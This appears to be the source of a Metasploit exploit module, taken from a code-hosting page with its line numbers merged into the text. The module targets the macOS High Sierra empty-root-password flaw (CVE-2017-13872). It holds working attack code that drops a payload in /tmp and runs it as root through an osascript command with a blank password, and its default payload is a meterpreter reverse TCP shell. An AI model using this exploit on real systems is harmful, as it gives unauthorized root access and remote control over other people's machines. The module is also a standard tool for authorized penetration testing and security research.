Path: blob/master/modules/exploits/osx/local/root_no_password.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::File9include Msf::Post::OSX::Priv10include Msf::Exploit::EXE11include Msf::Exploit::FileDropper1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Mac OS X Root Privilege Escalation',18'Description' => %q{19This module exploits a serious flaw in MacOSX High Sierra.20Any user can login with user "root", leaving an empty password.21},22'License' => MSF_LICENSE,23'References' => [24[ 'CVE', '2017-13872' ],25[ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ],26[ 'URL', 'https://news.ycombinator.com/item?id=15800676' ],27[ 'URL', 'https://forums.developer.apple.com/thread/79235' ],28],29'Platform' => 'osx',30'Arch' => ARCH_X64,31'Author' => [32'chethan177', # earliest public discovery33'lemiorhan', # making this well-known via Twitter34'timwr', # Metasploit module35],36'DefaultOptions' => {37'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',38},39'SessionTypes' => [ 'shell', 'meterpreter' ],40'Targets' => [41[ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', {} ]42],43'DefaultTarget' => 0,44'DisclosureDate' => '2017-11-29',45'Notes' => {46'Reliability' => UNKNOWN_RELIABILITY,47'Stability' => UNKNOWN_STABILITY,48'SideEffects' => UNKNOWN_SIDE_EFFECTS49}50)51)52end5354def exploit_cmd(root_payload)55"osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'"56end5758def exploit59if is_root?60fail_with Failure::BadConfig, 'Session already has root privileges'61end6263payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"64print_status("Writing payload file as '#{payload_file}'")65write_file(payload_file, payload.raw)66register_file_for_cleanup(payload_file)67output = cmd_exec("chmod +x #{payload_file}")68print_status("Executing payload file as '#{payload_file}'")69cmd_exec(exploit_cmd(payload_file))70end71end727374